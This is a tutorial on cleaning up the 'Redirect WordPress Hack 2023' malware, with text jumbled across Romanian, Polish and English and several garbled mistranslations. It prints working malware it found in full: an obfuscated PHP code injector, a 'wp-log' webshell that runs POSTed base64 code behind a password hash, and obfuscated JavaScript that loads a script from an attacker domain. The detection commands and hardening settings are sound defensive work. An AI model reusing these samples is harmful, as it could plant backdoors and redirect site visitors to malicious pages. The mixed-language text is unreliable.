WordPress este cu siguranță cea mai utilizată platformă CMS (Content Management System) atât pentru bloguri cât și pentru magazine online starter (cu modulul WooCommerce), ceea ce o face să fie și cea mai vizată de atacuri informatice (hacking). Una dintre cele mai utilizate operațiuni de hacking are drept obiectiv redirectionarea website-ului compromis către alte pagini web. Redirect WordPress Hack 2023 este un malware relativ nou care are ca impact redirectionarea intregului site catre pagini web de spam sau care la rândul lor pot virusa calculatoarele utilizatorilor.

Jeśli Twoja witryna stworzona na WordPressie zostaje przekierowana na inną stronę, najprawdopodobniej padła ofiarą słynnego już hacku przekierowań.

W tym samouczku znajdziesz niezbędne informacje i przydatne wskazówki, dzięki którym możesz odwirusować witrynę zainfekowaną przekierowaniem WordPress Hack (Virus Redirect). Poprzez komentarze możesz uzyskać dodatkowe informacje lub poprosić o pomoc.

Detectarea virusului care redirectioneaza site-urile WordPress

A sudden and unjustified decrease in website traffic, a decrease in the number of orders (in the case of online stores) or in advertising revenue are the first signs that something is wrong. Wykrywanie “Redirect WordPress Hack 2023” (Virus Redirect) se poate face și “wizualny” kiedy otwierasz witrynę i zostajesz przekierowany na inną stronę internetową.

Z doświadczenia wynika, że ​​większość szkodliwego oprogramowania internetowego jest kompatybilna z przeglądarkami internetowymi: Chrome, Firefox, Edge, Opera. Jeśli jesteś użytkownikiem komputera Mac, wirusy te nie są zbyt widoczne w przeglądarce Safari. System bezpieczeństwa przeglądarki Safari po cichu blokuje te złośliwe skrypty.

Ce trebuie să faci dacă ai un website virusat cu Redirect WordPress Hack

Mam nadzieję, że pierwszym krokiem nie będzie panika ani usunięcie witryny. Nawet zainfekowane lub wirusowe pliki nie powinny być najpierw usuwane. Zawierają cenne informacje, które mogą pomóc Ci zrozumieć, gdzie doszło do naruszenia bezpieczeństwa i co wpłynęło na wirusa. Sposób działania.

Închide website-ul pentru public.

Jak zamknąć witrynę wirusową dla odwiedzających? Najłatwiej jest użyć menedżera DNS i usunąć jego adres IP “A” (nazwa domeny) lub zdefiniuj dla niej nieistniejący adres IP. W ten sposób odwiedzający witrynę będą chronieni przed przekierowaniem hackowym WordPress, które może doprowadzić ich do stron internetowych z wirusami lub spamem.

Jeśli używasz CloudFlare jako menedżer DNS logujesz się na swoje konto i usuwasz rekordy DNS “A” dla nazwy domeny. W ten sposób domena dotknięta wirusem pozostanie bez adresu IP i nie będzie już można uzyskać do niej dostępu z Internetu.

Skopiuj adres IP witryny i wykonaj “trasa” aby tylko Ty miał do niego dostęp. Z Twojego komputera.

Jak zmienić prawdziwy adres IP strony internetowej na komputerach z systemem Windows?

Metodę tę często stosuje się do blokowania dostępu do niektórych stron internetowych poprzez edycję pliku “zastępy niebieskie”.

1. Otwórz Notatnik lub inny edytor tekstu (z uprawnieniami administratora) i edytuj plik “hosts“. Znajduje się w:

C:\Windows\System32\drivers\etc\hosts

2. W pliku “zastępy niebieskie” dodać “trasa” do prawdziwego adresu IP Twojej witryny. Adres IP usunięty powyżej z menedżera DNS.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Zapisz plik i wejdź na stronę internetową w przeglądarce.

Jeśli strona nie otwiera się i nie zrobiłeś nic złego w pliku “zastępy niebieskie”, najprawdopodobniej jest to pamięć podręczna DNS.

Aby wyczyścić pamięć podręczną DNS w systemie operacyjnym Windows, otwórz Wiersz Poleceń, w którym uruchom polecenie:

ipconfig /flushdns

Jak zmienić prawdziwy adres IP strony internetowej na komputerach Mac/Macbook?

W przypadku użytkowników komputerów Mac nieco łatwiej jest zmienić prawdziwy adres IP witryny internetowej.

1. Otwórz narzędzie Terminal.

2. Uruchom wiersz poleceń (do uruchomienia wymagane jest hasło systemowe):

sudo nano /etc/hosts

3. Podobnie jak w przypadku komputerów z systemem Windows, dodaj prawdziwy adres IP domeny.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Zapisz zmiany. Ctrl+X (y).

Po tym jak to zrobiłeś “trasa”, jesteś jedyną osobą, która może uzyskać dostęp do zainfekowanej witryny za pomocą Redirect WordPress Hack.

Pełna kopia zapasowa strony internetowej – Pliki i baza danych

Nawet jeśli jest zakażony “przekierowanie hacka WordPressa”zaleca się wykonanie ogólnej kopii zapasowej całej witryny. Pliki i baza danych. Ewentualnie możesz także zapisać lokalną kopię obu plików z public / public_html jak i bazę danych.

Identyfikacja plików używanych przez wirusy i tych zmodyfikowanych przez Redirect WordPress Hack 2023

Główne pliki docelowe WordPress Ja jestem index.php (w korzeniu), header.php, index.php I footer.php aktywnego motywu WordPress. Ręcznie sprawdź te pliki i zidentyfikuj złośliwy kod lub skrypt złośliwego oprogramowania.

W 2023 roku wirus typu “Przekieruj WordPress Hack” umieścić index.php kod postaci:

(Nie polecam uruchamiania tych kodów!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Odszyfrowane, to złośliwe oprogramowanie skryptowe jest to w zasadzie konsekwencja zainfekowania witryny WordPress. To nie skrypt stojący za złośliwym oprogramowaniem, to skrypt umożliwiający przekierowanie zainfekowanej strony internetowej. Jeśli odkodujemy powyższy skrypt, otrzymamy:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Aby zidentyfikować wszystkie pliki na serwerze zawierające ten kod, dobrze jest mieć do nich dostęp SSH do serwera, aby uruchomić wiersze poleceń sprawdzania plików i zarządzania nimi w systemie Linux.

Powiązany: Jak sprawdzić, czy Twój blog jest zainfekowany, czy nie, za pomocą wyszukiwarki Google. (wirus WordPressa)

Poniżej znajdują się dwa polecenia, które z pewnością przydadzą się do identyfikacji plików ostatnio modyfikowanych oraz plików zawierających określony kod (string).

Jak widzisz zmiany plików PHP w ciągu ostatnich 24 godzin lub w innym przedziale czasu w systemie Linux?

Rozkaz “find” jest bardzo prosty w użyciu i umożliwia dostosowanie ustawienia okresu czasu, ścieżki wyszukiwania i rodzaju plików.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Na wyjściu otrzymasz informację o dacie i godzinie modyfikacji pliku, uprawnieniach do zapisu/odczytu/wykonania (chmod) i do jakiej grupy/użytkownika należy.

Jeśli chcesz sprawdzić więcej dni temu, zmień wartość “-mtime -1” lub użyj “-mmin -360” przez kilka minut (6 godzin).

Jak wyszukać kod (ciąg) w plikach PHP, Java?

Linia poleceń “znajdować” którego możesz użyć do szybkiego znalezienia wszystkich plików PHP lub Java zawierających określony kod, jest następujący:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Polecenie wyszuka i wyświetli pliki .php I .js które zawierają “uJjBRODYsU“.

Za pomocą dwóch powyższych poleceń bardzo łatwo dowiesz się, które pliki były ostatnio modyfikowane, a które zawierają kod złośliwego oprogramowania.

Usuwa złośliwy kod ze zmodyfikowanych plików bez naruszania prawidłowego kodu. W moim scenariuszu złośliwe oprogramowanie zostało umieszczone przed otwarciem <head>.

Podczas wykonywania pierwszego polecenia “znajdować” jest całkiem możliwe, że odkryjesz także na serwerze nowe pliki, które nie są plikami WordPressa i nie zostały tam umieszczone przez Ciebie. Pliki należące do wirusa Redirect WordPress Hack.

W analizowanym przeze mnie scenariuszu na serwerze pojawiły się pliki kształtu “wp-log-nOXdgD.php“. To są pliki “generacja” które zawierają również kod złośliwego oprogramowania używany przez wirusa przekierowującego.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Przeznaczenie plików typu “wp-log-*” jest rozprzestrzenianie wirusa hackującego przekierowanie na inne strony internetowe hostowane na serwerze. Jest to kod złośliwego oprogramowania “webshell” złożony z A sekcja podstawowa (w którym zdefiniowano niektóre zaszyfrowane zmienne) i o sekcja wykonawcza za pomocą którego osoba atakująca próbuje załadować i wykonać w systemie szkodliwy kod.

Jeśli istnieje zmienna POST nazwany ‘bh‘ i jego zaszyfrowaną wartość MD5 jest równe “8f1f964a4b4d8d1ac3f0386693d28d03“, wówczas wydaje się, że skrypt zapisuje zaszyfrowaną treść base64 innej nazwanej zmiennej ‘b3‘ w pliku tymczasowym, a następnie próbuje dołączyć ten plik tymczasowy.

Jeśli istnieje zmienna POST Lub GET nazwany ‘tick', skrypt odpowie wartością MD5 sznurka “885“.

Aby zidentyfikować wszystkie pliki na serwerze zawierające ten kod, wybierz wspólny ciąg, a następnie uruchom komendę de “find” (podobnie jak powyżej). Usuń wszystkie pliki zawierające ten kod złośliwego oprogramowania.

Luka w zabezpieczeniach wykorzystywana przez przekierowanie WordPress Hack

Najprawdopodobniej ten wirus przekierowujący dociera przez wykorzystywanie użytkownika administratora WordPress lub identyfikując podatna wtyczka co umożliwia dodawanie użytkowników z uprawnieniami administratora.

W przypadku większości stron internetowych zbudowanych na platformie WordPress jest to możliwe edytowanie plików motywów lub wtyczek-urilor din interfața de administrare (Dashboard). Astfel, o persoană rău intenționată poate adăuga in fișierele temei coduri malware care să genereze scripturile prezentate mai sus.

Un exemplu de astfel de cod malware este acesta:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identificat în header-ul temei WordPress, imediat după deschiderea etichetei <head>.

Este destul de dificil de decriptat acest JavaScript, însă este evident ca interogheză o altă adresă web de unde cel mai probabil aduce alte scripturi pentru a crea fișierele “wp-log-*” despre care am vorbit mai sus.

Caută și șterge acest cod din toate fișierele PHP afectate.

Din câte am putut să-mi dau seama, acest cod a fost adăugat manual de un nou user cu priviliegii administrative.

Aby więc zapobiec dodawaniu złośliwego kodu z Panelu, najlepiej wyłączyć opcję edycji Motywów / Wtyczek WordPress z Panelu.

Edytuj plik wp-config.php i dodaj linie:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Po dokonaniu tej zmiany żaden użytkownik WordPressa nie będzie mógł edytować plików z poziomu Panelu.

Sprawdź użytkowników z rolą administratora

Poniżej znajduje się zapytanie SQL, którego możesz użyć do wyszukiwania użytkowników administracyjnych na platformie WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

To zapytanie zwróci wszystkich użytkowników w tabeli wp_users który przypisał rolę administratora. Zapytanie jest również wykonywane dla tabeli wp_usermeta aby przeszukać meta ‘wp_capabilities', który zawiera informacje o rolach użytkowników.

Inną metodą jest ich identyfikacja na podstawie: Dashboard → Users → All Users → Administrator. Istnieją jednak praktyki, dzięki którym można ukryć użytkownika w panelu Dashboard. Najlepszy sposób, aby zobaczyć użytkowników “Administrator” z WordPressa jest powyższe polecenie SQL.

W moim przypadku zidentyfikowałem użytkownika po nazwie w bazie danych “wp-import-user“. Całkiem sugestywne.

Tutaj możesz także zobaczyć datę i godzinę utworzenia użytkownika WordPress. Identyfikator użytkownika jest również bardzo ważny, ponieważ przeszukuje logi serwera. W ten sposób możesz zobaczyć całą aktywność tego użytkownika.

Usuń użytkowników z rolą administratora czego w takim razie nie wiesz zmienić hasła wszystkim użytkownikom administracyjnym. Redaktor, autor, administrator.

Zmień hasło użytkownika bazy danych SQL danej witryny internetowej.

Po wykonaniu tych kroków witrynę można ponownie uruchomić dla wszystkich użytkowników.

Pamiętaj jednak, że to, co przedstawiłem powyżej, to jeden z być może tysięcy scenariuszy, w których witryna internetowa zostaje zainfekowana Redirect WordPress Hack w 2023 roku.

Jeśli Twoja witryna została zainfekowana i potrzebujesz pomocy lub masz jakieś pytania, sekcja komentarzy jest otwarta.